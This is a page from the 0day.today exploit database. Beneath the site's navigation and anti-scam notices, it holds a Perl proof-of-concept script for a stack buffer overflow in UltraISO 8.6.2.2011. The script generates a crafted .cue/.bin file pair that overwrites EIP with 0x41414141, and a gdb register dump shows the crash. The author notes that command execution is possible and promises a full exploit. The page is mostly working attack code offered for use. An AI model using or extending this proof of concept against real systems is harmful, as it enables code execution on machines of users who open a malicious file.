0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
UltraISO <= 8.6.2.2011 (Cue/Bin Files) Local Buffer Overflow PoC
================================================================ UltraISO <= 8.6.2.2011 (Cue/Bin Files) Local Buffer Overflow PoC ================================================================ #!/usr/bin/perl ############################################################ #Credit:To n00b for finding this bug and writing poc. ############################################################ #Ultra ISO stack over flow poc code. #Ultra iso is exploitable via opening #a specially crafted Cue file..There is #A limitation that the user must have the bin #file in the same dir as the cue file. #This is the reason i have provided the #Bin file also Command execution is possible #As we can control $ebp and $eip hoooooha. #I will be working on the local exploit #as soon as i get a chance this should be a straight forward #to exploit this as we already gain control of the #$eip register.. #Tested on :win xp service pack 2 #Vendor's web site: http://www.ezbsystems.com/ultraiso # Version affected: UltraISO 8.6.2.2011 ############################################################ #Debug info as follows. ######################################### #Program received signal SIGSEGV, Segmentation fault. #[Switching to thread 1696.0x6d0] #0x41414141 in ?? () ############################################################ #(gdb) i r #eax 0x0 0 #ecx 0x7ce2fc 8184572 #edx 0x1 1 #ebx 0xfe6468 16671848 #esp 0x13ecf8 0x13ecf8 #ebp 0x41414141 0x41414141 #esi 0x0 0 #edi 0x13fa18 1309208 #eip 0x41414141 0x41414141 #eflags 0x10246 66118 #cs 0x1b 27 #ss 0x23 35 #ds 0x23 35 #es 0x23 35 #fs 0x3b 59 #gs 0x0 0 #fctrl 0xffff1273 -60813 #fstat 0xffff0000 -65536 #ftag 0xffffffff -1 #fiseg 0x0 0 #fioff 0x0 0 #foseg 0xffff0000 -65536 #fooff 0x0 0 #---Type <return> to continue, or q <return> to quit--- #fop 0x0 0 #(gdb) ############################################################ print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; print "0day Ultra-Iso 8.6.2.2011 stack over flow poc \n"; print "Credits to n00b for finding the bug and writing poc\n"; print "I will be writing a local exploit for this in a few days\n"; print "Shouts: - Str0ke - Marsu - SM - Aelphaeis - vade79 - c0ntex\n"; print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; my $CUEFILE="1.cue"; # Do not edit this my $BINFILE="1.bin"; # Do not edit this my $header= "\x46\x49\x4c\x45\x20\x22"; my $endheader= "\x2e\x42\x49\x4e\x22\x20\x42\x49\x4e\x41\x52\x59\x0d\x0a\x20". "\x54\x52\x41\x43\x4b\x20\x30\x31\x20\x4d\x4f\x44\x45\x31\x2f\x32". "\x33\x35\x32\x0d\x0a\x20\x20\x20\x49\x4e\x44\x45\x58\x20\x30\x31". "\x20\x30\x30\x3a\x30\x30\x3a\x30\x30"; open(CUE, ">$CUEFILE") or die "ERROR:$CUEFILE\n"; open(BIN, ">$BINFILE") or die "ERROR:$BINFILE\n"; print CUE $header; for ($i = 0; $i < 1024; $i++) { # Fill our buffer $buffer.= "\x41"; # For easy of debugging } print CUE $buffer; for ($i = 0; $i < 100; $i++) { # Fill our buffer $buffer2.= "\x90"; # Fill our bin file with nops..Why not pmsl. } print BIN $buffer2; print CUE $endheader; close(CUE,BIN); sleep(5); print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; print "Files have been created success-fully\n"; print "Please note you will have to have both 1.cue and 1.bin in the same dir\n"; print "To be able to reproduce the bug open the 1.cue file with ultra~iso\n"; print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; # 0day.today [2024-12-25] #